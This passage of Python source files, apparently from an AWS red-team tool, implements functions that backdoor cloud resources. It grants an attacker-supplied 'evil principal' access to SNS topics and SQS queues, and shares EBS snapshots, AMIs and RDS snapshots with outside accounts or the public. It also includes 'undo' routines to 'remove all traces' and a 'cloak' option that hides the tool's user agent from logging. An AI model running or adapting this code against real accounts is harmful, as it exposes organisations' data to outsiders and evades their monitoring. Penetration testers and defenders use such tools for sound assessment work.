new_policy_json["Statement"].append(json.loads(statement.__str__()))
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
get_rbp_response = self._get_rbp()
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=get_rbp_response.policy_document.json, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.remove_permission"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
message = "404: No backdoor statement found"
try:
for statement in self.policy_document.statements:
if statement.sid == constants.SID_SIGNATURE:
if not dry_run:
response = self.client.remove_permission(
TopicArn=self.arn,
Label=statement.sid,
)
else:
new_policy["Statement"].append(json.loads(statement.__str__()))
success = True
except botocore.exceptions.ClientError as error:
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=new_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def sns_actions_without_prefixes(self, actions_with_service_prefix):
# SNS boto3 client requires that you provide Publish instead of sns:Publish
updated_actions = []
if isinstance(actions_with_service_prefix, list):
actions = actions_with_service_prefix
else:
actions = [actions_with_service_prefix]
for action in actions:
if ":" in action:
temp_action = action.split(":")[1]
if temp_action == "*":
updated_actions.extend(valid_sns_policy_actions)
else:
updated_actions.append(temp_action)
else:
updated_actions.append(action)
return updated_actions
class SnsTopics(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "sns"
self.resource_type = "topic"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
these_resources = []
paginator = self.client.get_paginator('list_topics')
page_iterator = paginator.paginate()
for page in page_iterator:
resources = page["Topics"]
for resource in resources:
arn = resource.get("TopicArn")
name = get_resource_string(arn)
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
these_resources.append(list_resources_response)
return these_resources

View File

@ -0,0 +1,187 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_account_from_arn
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.utils import get_sid_names_with_error_handling
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class SqsQueue(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "sqs"
self.resource_type = "queue"
self.region = region
self.current_account_id = current_account_id
self.name = name
self.override_account_id_instead_of_principal = True
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
# override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
override_resource_block=self.override_resource_block)
self.queue_url = self._queue_url()
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.name}"
def _queue_url(self) -> str:
response = self.client.get_queue_url(
QueueName=self.name,
QueueOwnerAWSAccountId=self.current_account_id
)
return response.get("QueueUrl")
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
queue_url = self._queue_url()
policy = constants.get_empty_policy()
try:
response = self.client.get_queue_attributes(QueueUrl=queue_url, AttributeNames=["All"])
# response = self.client.get_queue_attributes(QueueUrl=queue_url, AttributeNames=["Policy"])
attributes = response.get("Attributes")
if attributes.get("Policy"):
policy = constants.get_empty_policy()
policy["Statement"].extend(json.loads(attributes.get("Policy")).get("Statement"))
success = True
except botocore.exceptions.ClientError as error:
# When there is no policy, let's return an empty policy to avoid breaking things
logger.critical(error)
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy_document = PolicyDocument(
policy=evil_policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
new_policy_json = {
"Version": "2012-10-17",
"Statement": []
}
current_sids = get_sid_names_with_error_handling(self.original_policy)
try:
for statement in new_policy_document.statements:
if statement.sid not in current_sids:
account_ids = []
for principal in statement.aws_principals:
if ":" in principal:
account_ids.append(get_account_from_arn(principal))
self.client.add_permission(
QueueUrl=self.queue_url,
Label=statement.sid,
AWSAccountIds=account_ids,
Actions=self.sqs_actions_without_prefixes(statement.actions)
)
else:
new_policy_json["Statement"].append(json.loads(statement.__str__()))
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
get_rbp_response = self._get_rbp()
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=get_rbp_response.policy_document.json, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.remove_permission"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
message = "404: No backdoor statement found"
success = False
for statement in self.policy_document.statements:
if statement.sid == constants.SID_SIGNATURE:
if not dry_run:
# TODO: Error handling for setting policy
self.client.remove_permission(
QueueUrl=self.queue_url,
Label=statement.sid,
)
message = f"200: Removed backdoor statement from the resource policy attached to {self.arn}"
success = True
break
else:
new_policy["Statement"].append(json.loads(statement.__str__()))
response_message = ResponseMessage(message=message, operation=operation, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=new_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service, success=success)
return response_message
def sqs_actions_without_prefixes(self, actions_with_service_prefix):
# SQS boto3 client requires that you provide SendMessage instead of sqs:SendMessage
updated_actions = []
if isinstance(actions_with_service_prefix, list):
actions = actions_with_service_prefix
else:
actions = [actions_with_service_prefix]
for action in actions:
if ":" in action:
temp_action = action.split(":")[1]
if temp_action == "*":
updated_actions.extend("*")
else:
updated_actions.append(temp_action)
else:
updated_actions.append(action)
return updated_actions
class SqsQueues(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "sqs"
self.resource_type = "queue"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_queues")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page.get("QueueUrls")
if these_resources:
for resource in these_resources:
# queue URL takes the format:
# "https://{REGION_ENDPOINT}/queue.|api-domain|/{YOUR_ACCOUNT_NUMBER}/{YOUR_QUEUE_NAME}"
# Let's split it according to /, and the name is the last item on the list
queue_url = resource
name = queue_url.split("/")[-1]
arn = f"arn:aws:sqs:{self.region}:{self.current_account_id}:{name}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name, note=queue_url)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,30 @@
# Resource that can be made public through sharing APIs
## Support Status
### AMI
Actions:
- ec2 [modify-image-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-image-attribute.html)
### EBS snapshot
Actions:
- ec2 [modify-snapshot-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-snapshot-attribute.html)
- [moto modify_snapshot_attribute](https://github.com/spulec/moto/blob/master/moto/ec2/responses/elastic_block_store.py#L129)
- [moto describe_snapshot_attribute](https://github.com/spulec/moto/blob/master/moto/ec2/responses/elastic_block_store.py#L122)
### RDS snapshot
Actions:
- rds [modify-db-snapshot](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/modify-db-snapshot.html)
- [CLI to share a snapshot](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html#USER_ShareSnapshot.Sharing)
## Not supported (yet)
### FPGA image
Actions:
- ec2 [modify-fpga-image-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-fpga-image-attribute.html)
### RDS DB Cluster snapshot
Actions:
- rds [modify-db-cluster-snapshot-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/modify-db-cluster-snapshot-attribute.html)

View File

@ -0,0 +1,97 @@
import copy
from abc import ABCMeta, abstractmethod
import boto3
import botocore
from botocore.exceptions import ClientError
class ResponseGetSharingApi:
def __init__(
self,
shared_with_accounts: list,
success: bool,
resource_type: str,
resource_name: str,
service: str,
updated_policy: list, # we can format this however we want even though there are no RBPs
original_policy: list, # we can format this however we want even though there are no RBPs
evil_principal: str,
victim_resource_arn: str
):
self.shared_with_accounts = shared_with_accounts
self.success = success
self.evil_principal = evil_principal
self.victim_resource_arn = victim_resource_arn
self.resource_type = resource_type
self.resource_name = resource_name
self.service = service
self.original_policy = original_policy
self.updated_policy = updated_policy
# This is kind of silly because this is just a list of account IDs, but I am going to piggyback off of the previous
# structure out of convenience
# TODO: Figure out a better way to do this. Mostly because I am doing the RDS and EBS sharing last minute
@property
def updated_policy_sids(self) -> list:
return self.updated_policy
@property
def original_policy_sids(self) -> list:
return self.original_policy
@property
def added_sids(self) -> list:
diff = []
if len(self.updated_policy_sids) > len(self.original_policy_sids):
diff = list(set(self.updated_policy_sids) - set(self.original_policy_sids))
return diff
@property
def removed_sids(self) -> list:
diff = []
if len(self.original_policy_sids) > len(self.updated_policy_sids):
diff = list(set(self.original_policy_sids) - set(self.updated_policy_sids))
return diff
class ResourceSharingApi(object):
__meta_class__ = ABCMeta
def __init__(
self,
name: str,
resource_type: str,
service: str,
region: str,
client: boto3.Session.client,
current_account_id: str,
):
self.name = name
self.resource_type = resource_type
self.client = client
self.current_account_id = current_account_id
self.service = service
self.region = region
self.shared_with_accounts = self._get_shared_with_accounts().shared_with_accounts
self.original_shared_with_accounts = copy.deepcopy(self.shared_with_accounts)
@property
@abstractmethod
def arn(self) -> str:
raise NotImplementedError("Must override arn")
@abstractmethod
def _get_shared_with_accounts(self) -> ResponseGetSharingApi:
raise NotImplementedError("Must override _get_shared_with_accounts")
@abstractmethod
def share(self, accounts_to_add: list, accounts_to_remove: list) -> ResponseGetSharingApi:
raise NotImplementedError("Must override share")
@abstractmethod
def add_myself(self, evil_policy: dict) -> ResponseGetSharingApi:
raise NotImplementedError("Must override add_myself")
@abstractmethod
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
raise NotImplementedError("Must override undo")

View File

@ -0,0 +1,200 @@
import logging
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_path_from_arn, get_account_from_arn
from endgame.exposure_via_resource_policies.common import ResourceTypes
from endgame.exposure_via_sharing_apis.common import ResourceSharingApi, ResponseGetSharingApi
from endgame.shared.list_resources_response import ListResourcesResponse
logger = logging.getLogger(__name__)
class EbsSnapshot(ResourceSharingApi, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "ebs"
self.resource_type = "snapshot"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:ec2:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_shared_with_accounts(self) -> ResponseGetSharingApi:
logger.debug("Getting snapshot status policy for %s" % self.arn)
shared_with_accounts = []
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_snapshot_attribute
response = self.client.describe_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
)
attributes = response.get("CreateVolumePermissions")
for attribute in attributes:
if attribute.get("Group"):
if attribute.get("Group") == "all":
shared_with_accounts.append("all")
if attribute.get("UserId"):
shared_with_accounts.append(attribute.get("UserId"))
success = True
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=shared_with_accounts,
updated_policy=[]
)
return response_message
def share(self, accounts_to_add: list, accounts_to_remove: list) -> ResponseGetSharingApi:
shared_with_accounts = []
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.modify_snapshot_attribute
try:
if accounts_to_add:
logger.debug(f"Sharing the snapshot {self.name} with the accounts {', '.join(accounts_to_add)}")
if "all" in accounts_to_add:
self.client.modify_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
GroupNames=["all"],
OperationType="add",
)
else:
self.client.modify_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
UserIds=accounts_to_add,
OperationType="add",
)
if accounts_to_remove:
logger.debug(f"Removing access to the snapshot {self.name} from the accounts {', '.join(accounts_to_add)}")
if "all" in accounts_to_remove:
self.client.modify_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
GroupNames=["all"],
OperationType="remove",
)
else:
self.client.modify_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
UserIds=accounts_to_remove,
OperationType="remove",
)
shared_with_accounts = self._get_shared_with_accounts().shared_with_accounts
success = True
except botocore.exceptions.ClientError:
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=self.original_shared_with_accounts
)
return response_message
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Add your rogue principal to the AWS resource"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Sharing {self.arn} with {evil_account_id}")
shared_with_accounts = []
if not dry_run:
accounts_to_add = [evil_account_id]
share_response = self.share(accounts_to_add=accounts_to_add, accounts_to_remove=[])
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
try:
# this is just to get the success message
tmp = self._get_shared_with_accounts()
success = tmp.success
shared_with_accounts = tmp.shared_with_accounts
shared_with_accounts.append(evil_account_id)
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Remove all traces"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Removing {evil_account_id} access to {self.arn}")
shared_with_accounts = []
if not dry_run:
accounts_to_remove = [evil_account_id]
share_response = self.share(accounts_to_add=[], accounts_to_remove=accounts_to_remove)
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
shared_with_accounts = self.shared_with_accounts
if evil_account_id in shared_with_accounts:
shared_with_accounts.remove(evil_account_id)
success = True
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def parse_evil_principal(self, evil_principal: str) -> str:
if ":" in evil_principal:
evil_account_id = get_account_from_arn(evil_principal)
# RDS requires publicly shared snapshots to be supplied via the value "all"
elif evil_principal == "*":
evil_account_id = "all"
# Otherwise, the evil_principal is an account ID
else:
evil_account_id = evil_principal
return evil_account_id
class EbsSnapshots(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "ebs"
self.resource_type = "snapshot"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Paginator.DescribeSnapshots
paginator = self.client.get_paginator("describe_snapshots")
# Apply a filter, otherwise we get public EBS snapshots too, from randos on the internet.
page_iterator = paginator.paginate(Filters=[
{
"Name": "owner-id",
"Values": [self.current_account_id]
}
])
for page in page_iterator:
these_resources = page["Snapshots"]
for resource in these_resources:
snapshot_id = resource.get("SnapshotId")
kms_key_id = resource.get("KmsKeyId")
volume_id = resource.get("VolumeId")
arn = f"arn:aws:ec2:{self.region}:{self.current_account_id}:snapshot/{snapshot_id}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=snapshot_id)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,189 @@
import logging
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_path_from_arn, get_account_from_arn
from endgame.exposure_via_resource_policies.common import ResourceTypes
from endgame.exposure_via_sharing_apis.common import ResourceSharingApi, ResponseGetSharingApi
from endgame.shared.list_resources_response import ListResourcesResponse
logger = logging.getLogger(__name__)
class Ec2Image(ResourceSharingApi, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "ec2-ami"
self.resource_type = "image"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:ec2:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_shared_with_accounts(self) -> ResponseGetSharingApi:
logger.debug("Getting snapshot status policy for %s" % self.arn)
shared_with_accounts = []
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_image_attribute
response = self.client.describe_image_attribute(
ImageId=self.name,
Attribute="launchPermission"
)
if response.get("LaunchPermissions"):
for launch_permission in response.get("LaunchPermissions"):
if launch_permission.get("Group"):
if launch_permission.get("Group") == "all":
shared_with_accounts.append("all")
if launch_permission.get("UserId"):
shared_with_accounts.append(launch_permission.get("UserId"))
success = True
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=shared_with_accounts,
updated_policy=[]
)
return response_message
def share(self, accounts_to_add: list, accounts_to_remove: list) -> ResponseGetSharingApi:
shared_with_accounts = []
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.modify_image_attribute
try:
if accounts_to_add:
logger.debug(f"Sharing the AMI {self.name} with the accounts {', '.join(accounts_to_add)}")
if "all" in accounts_to_add:
self.client.modify_image_attribute(
ImageId=self.name,
LaunchPermission={"Add": [{"Group": "all"}]},
)
else:
user_ids = []
for account in accounts_to_add:
user_ids.append({"UserId": account})
self.client.modify_image_attribute(
ImageId=self.name,
LaunchPermission={"Add": user_ids},
)
if accounts_to_remove:
logger.debug(f"Removing access to the AMI {self.name} from the accounts {', '.join(accounts_to_add)}")
if "all" in accounts_to_remove:
self.client.modify_image_attribute(
ImageId=self.name,
LaunchPermission={"Remove": [{"Group": "all"}]},
)
else:
user_ids = []
for account in accounts_to_remove:
user_ids.append({"UserId": account})
self.client.modify_image_attribute(
ImageId=self.name,
LaunchPermission={"Remove": user_ids},
)
shared_with_accounts = self._get_shared_with_accounts().shared_with_accounts
success = True
except botocore.exceptions.ClientError:
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=self.original_shared_with_accounts
)
return response_message
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Add your rogue principal to the AWS resource"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Sharing {self.arn} with {evil_account_id}")
shared_with_accounts = []
if not dry_run:
accounts_to_add = [evil_account_id]
share_response = self.share(accounts_to_add=accounts_to_add, accounts_to_remove=[])
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
try:
# this is just to get the success message
tmp = self._get_shared_with_accounts()
success = tmp.success
shared_with_accounts = tmp.shared_with_accounts
shared_with_accounts.append(evil_account_id)
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Remove all traces"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Removing {evil_account_id} access to {self.arn}")
shared_with_accounts = []
if not dry_run:
accounts_to_remove = [evil_account_id]
share_response = self.share(accounts_to_add=[], accounts_to_remove=accounts_to_remove)
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
shared_with_accounts = self.shared_with_accounts
if evil_account_id in shared_with_accounts:
shared_with_accounts.remove(evil_account_id)
success = True
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def parse_evil_principal(self, evil_principal: str) -> str:
if ":" in evil_principal:
evil_account_id = get_account_from_arn(evil_principal)
# RDS requires publicly shared snapshots to be supplied via the value "all"
elif evil_principal == "*":
evil_account_id = "all"
# Otherwise, the evil_principal is an account ID
else:
evil_account_id = evil_principal
return evil_account_id
class Ec2Images(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "ec2-ami"
self.resource_type = "image"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
response = self.client.describe_images(Owners=[self.current_account_id])
these_resources = response["Images"]
for resource in these_resources:
image_id = resource.get("ImageId")
name = resource.get("Name")
volume_id = resource.get("VolumeId")
arn = f"arn:aws:ec2:{self.region}:{self.current_account_id}:{self.resource_type}/{image_id}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=image_id)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,170 @@
import logging
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_path_from_arn, get_account_from_arn
from endgame.exposure_via_resource_policies.common import ResourceTypes
from endgame.exposure_via_sharing_apis.common import ResourceSharingApi, ResponseGetSharingApi
from endgame.shared.list_resources_response import ListResourcesResponse
logger = logging.getLogger(__name__)
class RdsSnapshot(ResourceSharingApi, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "rds"
self.resource_type = "snapshot"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_shared_with_accounts(self) -> ResponseGetSharingApi:
logger.debug("Getting snapshot status policy for %s" % self.arn)
shared_with_accounts = []
try:
response = self.client.describe_db_snapshot_attributes(
DBSnapshotIdentifier=self.name
)
attributes = response.get("DBSnapshotAttributesResult").get("DBSnapshotAttributes")
for attribute in attributes:
if attribute.get("AttributeName") == "restore":
shared_with_accounts.extend(attribute.get("AttributeValues"))
break
success = True
except botocore.exceptions.ClientError:
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=shared_with_accounts,
updated_policy=[]
)
return response_message
def share(self, accounts_to_add: list, accounts_to_remove: list) -> ResponseGetSharingApi:
shared_with_accounts = []
if accounts_to_add:
logger.debug(f"Sharing the snapshot {self.name} with the accounts {', '.join(accounts_to_add)}")
if accounts_to_remove:
logger.debug(f"Removing access to snapshot {self.name} for the accounts {', '.join(accounts_to_add)}")
try:
snapshot_attributes_response = self.client.modify_db_snapshot_attribute(
DBSnapshotIdentifier=self.name,
AttributeName='restore',
ValuesToAdd=accounts_to_add,
ValuesToRemove=accounts_to_remove
)
attributes = snapshot_attributes_response.get("DBSnapshotAttributesResult").get("DBSnapshotAttributes")
for attribute in attributes:
if attribute.get("AttributeName") == "restore":
shared_with_accounts.extend(attribute.get("AttributeValues"))
break
success = True
except botocore.exceptions.ClientError:
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=self.original_shared_with_accounts
)
return response_message
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Add your rogue principal to the AWS resource"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Sharing {self.arn} with {evil_account_id}")
shared_with_accounts = []
if not dry_run:
accounts_to_add = [evil_account_id]
share_response = self.share(accounts_to_add=accounts_to_add, accounts_to_remove=[])
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
try:
# this is just to get the success message
tmp = self._get_shared_with_accounts()
success = tmp.success
shared_with_accounts = tmp.shared_with_accounts
shared_with_accounts.append(evil_account_id)
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Remove all traces"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Removing {evil_account_id} access to {self.arn}")
shared_with_accounts = []
if not dry_run:
accounts_to_remove = [evil_account_id]
share_response = self.share(accounts_to_add=[], accounts_to_remove=accounts_to_remove)
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
shared_with_accounts = self.shared_with_accounts
if evil_account_id in shared_with_accounts:
shared_with_accounts.remove(evil_account_id)
success = True
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def parse_evil_principal(self, evil_principal: str) -> str:
if ":" in evil_principal:
evil_account_id = get_account_from_arn(evil_principal)
# RDS requires publicly shared snapshots to be supplied via the value "all"
elif evil_principal == "*":
evil_account_id = "all"
# Otherwise, the evil_principal is an account ID
else:
evil_account_id = evil_principal
return evil_account_id
class RdsSnapshots(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "rds"
self.resource_type = "snapshot"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("describe_db_snapshots")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["DBSnapshots"]
for resource in these_resources:
snapshot_identifier = resource.get("DBSnapshotIdentifier")
instance_identifier = resource.get("DBInstanceIdentifier")
arn = resource.get("DBSnapshotArn")
snapshot_name = get_resource_path_from_arn(arn)
# arn:${Partition}:rds:${Region}:${Account}:snapshot:${SnapshotName}
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=snapshot_name)
resources.append(list_resources_response)
return resources

View File

View File

@ -0,0 +1,39 @@
import os
import logging
import boto3
from botocore.config import Config
from endgame.shared import constants
logger = logging.getLogger(__name__)
def get_boto3_client(profile, service: str, region="us-east-1", cloak: bool = False) -> boto3.Session.client:
logging.getLogger('botocore').setLevel(logging.CRITICAL)
session_data = {"region_name": region}
if profile:
session_data["profile_name"] = profile
session = boto3.Session(**session_data)
if cloak:
config = Config(connect_timeout=5, retries={"max_attempts": 10})
else:
config = Config(connect_timeout=5, retries={"max_attempts": 10}, user_agent=constants.USER_AGENT_INDICATOR)
if os.environ.get('LOCALSTACK_ENDPOINT_URL'):
client = session.client(service, config=config, endpoint_url=os.environ.get('LOCALSTACK_ENDPOINT_URL'))
else:
client = session.client(service, config=config, endpoint_url=os.environ.get('LOCALSTACK_ENDPOINT_URL'))
logger.debug(f"{client.meta.endpoint_url} in {client.meta.region_name}: boto3 client login successful")
return client
def get_current_account_id(sts_client: boto3.Session.client) -> str:
response = sts_client.get_caller_identity()
current_account_id = response.get("Account")
return current_account_id
def get_available_regions(service: str):
